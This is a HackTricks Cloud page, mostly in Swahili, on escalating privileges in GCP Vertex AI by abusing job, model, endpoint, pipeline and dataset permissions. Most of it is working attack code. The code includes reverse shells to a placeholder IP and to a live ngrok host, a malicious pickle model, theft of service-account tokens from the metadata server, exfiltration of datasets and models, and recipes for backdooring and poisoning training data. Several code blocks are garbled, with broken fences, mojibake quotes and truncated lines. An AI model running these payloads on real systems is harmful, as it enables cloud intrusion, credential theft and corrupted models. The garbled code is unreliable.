HackTricks CloudGCP - Vertex AI Privesc
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na đŹ Discord group au the telegram group au utufuate kwenye Twitter đŚ @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
Vertex AI
Kwa maelezo zaidi kuhusu Vertex AI angalia:
Kwa njia za post-exploitation za Agent Engine / Reasoning Engine zinazotumia runtime metadata service, wakala wa default wa huduma ya Vertex AI, na pivoting kuvuka-projekti kuelekea rasilimali za consumer / producer / tenant, angalia:
GCP - Vertex AI Post Exploitation
aiplatform.customJobs.create, iam.serviceAccounts.actAs
Kwa idhini ya aiplatform.customJobs.create na iam.serviceAccounts.actAs kwenye service account lengwa, mshambuliaji anaweza kutekeleza msimbo wowote kwa vibali vilivyoongezeka.
Hii inafanya kazi kwa kuunda custom training job inayotekeleza msimbo unaodhibitiwa na mshambuliaji (iwe ni custom container au Python package). Kwa kutaja service account yenye vibali maalum kupitia bendera ya --service-account, job inarithi ruhusa za service account hiyo. Job inafanya kazi kwenye miundombinu inayosimamiwa na Google na ina upatikanaji wa GCP metadata service, ikiruhusu uondoaji wa OAuth access token ya service account.
Impact: Uongezaji kamili wa ruhusa hadi kwa ruhusa za service account lengwa.
Unda custom job yenye reverse shell
```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region=On your attacker machine, start a listener first:
nc -lvnp 4444
Once connected, you can extract the token with:
curl -H âMetadata-Flavor: Googleâ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create
âregion=
âdisplay-name=revshell-job
âworker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
âcommand=sh
âargs=-c,âpython3 -c âimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])ââ
âservice-account=
</details>
<details>
<summary>Chaguo mbadala: Pata token kutoka kwenye logi</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
aiplatform.models.upload, aiplatform.models.get
Mbinu hii inafanikisha privilege escalation kwa kupakia modeli kwenye Vertex AI kisha kutumia modeli hiyo kutekeleza code yenye ruhusa zilizoinuliwa kupitia endpoint deployment au batch prediction job.
Note
Ili kufanya shambulio hili inahitajika kuwa na GCS bucket inayosomeka kwa wote (world readable) au kuunda mpya ili kupakia model artifacts.
Pakia pickled model yenye madhara na reverse shell
```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickleclass MaliciousModel: def reduce(self): import subprocess cmd = âbash -i >& /dev/tcp/YOUR-IP/4444 0>&1â return (subprocess.Popen, ([â/bin/bashâ, â-câ, cmd],))
Save malicious model
with open(âmodel.pklâ, âwbâ) as f: pickle.dump(MaliciousModel(), f) EOF
python3 create_malicious_model.py
Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/
Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload
âregion=
âartifact-uri=gs://your-bucket/malicious-model/
âdisplay-name=malicious-sklearn
âcontainer-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest
On attacker: nc -lvnp 4444 (shell connects when deployment starts)
</details>
<details>
<summary>Pakia modeli na container reverse shell</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
[!DANGER] Baada ya kupakia modeli hatari, mdukuzi anaweza kusubiri mtu aitumie modeli hiyo, au kuizindua yeye mwenyewe kupitia endpoint deployment au batch prediction job.
iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )
Ikiwa una ruhusa za kuunda na deploy modeli kwenye endpoints, au kubadilisha endpoint IAM policies, unaweza kutumia modeli hatari zilizopakiwa kwenye project kufanikisha privilege escalation. Ili kuchochea moja ya modeli hatari zilizopakiwa hapo awali kupitia endpoint, unachohitaji kufanya ni:
Weka modeli hatari kwenye endpoint
```bash # Create an endpoint gcloud ai endpoints create \ --region=Deploy with privileged service account
gcloud ai endpoints deploy-model
âregion=
âmodel=
âdisplay-name=revshell-deployment
âservice-account=
âmachine-type=n1-standard-2
âmin-replica-count=1
</details>
#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
Ikiwa una ruhusa za kuunda **batch prediction jobs** na kuiendesha kwa service account, unaweza kufikia metadata service. Msimbo hatari unaendeshwa kutoka kwa **custom prediction container** au **malicious model** wakati wa mchakato wa batch prediction.
**Note**: Batch prediction jobs zinaweza tu kuundwa kupitia REST API au Python SDK (hakuna msaada wa gcloud CLI).
> [!NOTE]
> Shambulio hili linahitaji kwanza kupakia malicious model (tazama sehemu ya `aiplatform.models.upload` hapo juu) au kutumia custom prediction container yenye reverse shell code yako.
<details>
<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.models.export
Ikiwa una ruhusa ya models.export, unaweza kuhamisha vitu vya modeli kwenye GCS bucket unayodhibiti, na hivyo uweze kupata data za mafunzo zinazohusiana au faili za modeli zenye siri.
Note
Ili kutekeleza shambulio hili unahitaji kuwa na GCS bucket inayoweza kusomwa na kuandikwa na watu wote (world readable and writable) au kuunda mpya ili kupakia vitu vya modeli.
Hamisha vitu vya modeli kwenye GCS bucket
```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"curl -X POST
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
-H âContent-Type: application/jsonâ
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:exportâ
-d â{
âoutputConfigâ: {
âexportFormatIdâ: âcustom-trainedâ,
âartifactDestinationâ: {
âoutputUriPrefixâ: âgs://your-controlled-bucket/exported-models/â
}
}
}â
Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
</details>
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Unda **ML pipeline jobs** zinazotekeleza hatua nyingi kwa kutumia containers yoyote na kufanikisha privilege escalation kupitia reverse shell access.
Pipelines ni hasa zenye nguvu kwa privilege escalation kwa sababu zinaunga mkono multi-stage attacks ambapo kila sehemu inaweza kutumia containers tofauti na configurations tofauti.
> [!NOTE]
> Unahitaji GCS bucket inayoweza kuandikwa na wote ili itumike kama pipeline root.
<details>
<summary>Sakinisha Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Unda pipeline job na reverse shell container
```python #!/usr/bin/env python3 import json import subprocessPROJECT_ID = â
Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = { âschemaVersionâ: â2.1.0â, âsdkVersionâ: âkfp-2.0.0â, âpipelineInfoâ: { ânameâ: âdata-processing-pipelineâ }, ârootâ: { âdagâ: { âtasksâ: { âprocess-taskâ: { âtaskInfoâ: { ânameâ: âprocess-taskâ }, âcomponentRefâ: { ânameâ: âcomp-processâ } } } } }, âcomponentsâ: { âcomp-processâ: { âexecutorLabelâ: âexec-processâ } }, âdeploymentSpecâ: { âexecutorsâ: { âexec-processâ: { âcontainerâ: { âimageâ: âpython:3.11-slimâ, âcommandâ: [âpython3â], âargsâ: [â-câ, âimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((â4.tcp.eu.ngrok.ioâ,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([â/bin/bashâ,â-iâ])â] } } } } }
Create the request body
request_body = { âdisplayNameâ: âml-training-pipelineâ, âruntimeConfigâ: { âgcsOutputDirectoryâ: âgs://gstorage-name/folderâ }, âpipelineSpecâ: pipeline_spec, âserviceAccountâ: TARGET_SA }
Get access token
token_result = subprocess.run( [âgcloudâ, âauthâ, âprint-access-tokenâ], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()
Submit via REST API
import requests
url = fâhttps://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobsâ headers = { âAuthorizationâ: fâBearer {access_token}â, âContent-Typeâ: âapplication/jsonâ }
print(fâSubmitting pipeline job to {url}â) response = requests.post(url, headers=headers, json=request_body)
if response.status_code in [200, 201]: result = response.json() print(fââ Pipeline job submitted successfully!â) print(fâ Job name: {result.get(ânameâ, âN/Aâ)}â) print(fâ Check your reverse shell listener for connectionâ) else: print(fââ Error: {response.status_code}â) print(fâ {response.text}â)
</details>
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Tengeneza **hyperparameter tuning jobs** ambazo zinaendesha arbitrary code kwa ruhusa zilizoongezeka kupitia custom training containers.
Hyperparameter tuning jobs zinakuwezesha kuendesha majaribio mengi ya mafunzo sambamba, kila moja ikiwa na thamani tofauti za hyperparameter. Kwa kubainisha container hatarishi yenye reverse shell au exfiltration command, na kuihusisha na service account yenye mamlaka, unaweza kupata privilege escalation.
**Athari**: Full privilege escalation hadi ruhusa za service account lengwa.
<details>
<summary>Tengeneza hyperparameter tuning job yenye reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.datasets.export
Hamisha datasets ili exfiltrate data za mafunzo ambazo zinaweza kuwa na taarifa nyeti.
Kumbuka: Operesheni za datasets zinahitaji REST API au Python SDK (gcloud CLI haina msaada kwa datasets).
Datasets mara nyingi zina data asili za mafunzo ambazo zinaweza kujumuisha PII, data za kibiashara za siri, au taarifa nyingine nyeti ambazo zilitumika kufundisha modeli za uzalishaji.
Hamisha dataset ili exfiltrate data za mafunzo
```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"curl -s -X GET
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasetsâ
Step 2: Export a dataset to your own bucket using REST API
DATASET_ID=â
curl -X POST
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
-H âContent-Type: application/jsonâ
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:exportâ
-d â{
âexportConfigâ: {
âgcsDestinationâ: {âoutputUriPrefixâ: âgs://your-controlled-bucket/exported-data/â}
}
}â
The export operation runs asynchronously and will return an operation ID
Wait a few seconds for the export to complete
Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/
Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./
Step 4: View the exported data
The data will be in JSONL format with references to training data locations
cat exported-data//data-.jsonl
The exported data may contain:
- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data
</details>
### `aiplatform.datasets.import`
Leta data yenye madhara au iliyochafuliwa katika datasets zilizopo ili **kuathiri mafunzo ya modeli na kuingiza backdoors**.
**Note**: Operesheni za dataset zinahitaji REST API au Python SDK (hakuna msaada wa gcloud CLI kwa datasets).
Kwa kuingiza data iliyotengenezwa kwa makusudi katika dataset inayotumika kwa mafunzo ya modeli za ML, attacker anaweza:
- Kuingiza backdoors katika modeli (trigger-based misclassification)
- Poison training data ili kudhoofisha utendaji wa modeli
- Inject data ili kusababisha modeli ku leak taarifa
- Kuathiri tabia ya modeli kwa inputs maalum
Shambulio hili linafanya kazi vizuri hasa linapotengwa datasets zinazotumika kwa:
- Uainishaji wa picha (inject picha zilizoandikwa vibaya)
- Uainishaji wa maandishi (inject maandishi yenye upendeleo au yenye madhara)
- Ugundaji wa vitu (manipulate bounding boxes)
- Mifumo ya mapendekezo (inject upendeleo feki)
<details>
<summary>Import poisoned data into dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
Matukio ya Shambulio:
Backdoor attack - Uainishaji wa picha
```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```Label flipping attack
```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```Data poisoning kwa model extraction
```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```Shambulio lililolengwa dhidi ya entiti maalum
```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```[!DANGER] Mashambulizi ya kuchafua data yanaweza kuwa na matokeo mabaya:
- Security systems: Kupita mfumo wa kutambua uso au utambuzi wa upotofu
- Fraud detection: Kufundisha modeli kutotambua mifumo maalum ya udanganyifu
- Content moderation: Kufanya maudhui hatarishi yatajwe kuwa salama
- Medical AI: Kutofafanua kwa usahihi hali muhimu za kiafya
- Autonomous systems: Kuathiri utambuzi wa vitu kwa maamuzi muhimu kwa usalama
Impact:
- Backdoored models ambazo hutofautisha vibaya kwa vichocheo maalum
- Kupungua kwa utendaji na usahihi wa modeli
- Modeli zenye upendeleo ambazo zinatoa ubaguzi dhidi ya baadhi ya ingizo
- Information leak kupitia tabia ya modeli
- Uendelevu wa muda mrefu (modeli zilizofunzwa kwa data iliyochafuliwa zitapokea backdoor)
aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs
Warning
Note
Deprecated API: API ya
aiplatform.notebookExecutionJobs.createimepitwa na wakati kama sehemu ya kuondolewa kwa Vertex AI Workbench Managed Notebooks. Njia ya kisasa ni kutumia Vertex AI Workbench Executor ambayo inaendesha notebooks kupitiaaiplatform.customJobs.create(imetajwa hapo juu). The Vertex AI Workbench Executor inaruhusu kupanga kuendesha notebooks ambazo zinafanyika kwenye miundombinu ya mafunzo maalum ya Vertex AI kwa kutumia service account iliyobainishwa. Hii kwa msingi ni convenience wrapper juu yacustomJobs.create. For privilege escalation via notebooks: Use theaiplatform.customJobs.createmethod documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.
The following technique is provided for historical context only and is not recommended for use in new assessments.
Tengeneza notebook execution jobs ambazo zinaendesha Jupyter notebooks zenye msimbo wowote.
Notebook jobs ni bora kwa utekelezaji wa msimbo wa mtindo wa mwingiliano kwa kutumia service account, kwani zinaunga mkono seli za msimbo wa Python na amri za shell.
Tengeneza faili ya notebook hasidi
```bash # Create a malicious notebook cat > malicious.ipynb <<'EOF' { "cells": [ { "cell_type": "code", "source": [ "import subprocess\n", "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n", "print(token.decode())" ] } ], "metadata": {}, "nbformat": 4 } EOFUpload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
</details>
<details>
<summary>Endesha notebook kwa service account lengwa</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'
# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
Marejeo
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
Jifunze na ufanye mazoezi ya GCP Hacking:
Jifunze na ufanye mazoezi ya Az Hacking:Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na đŹ Discord group au the telegram group au utufuate kwenye Twitter đŚ @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.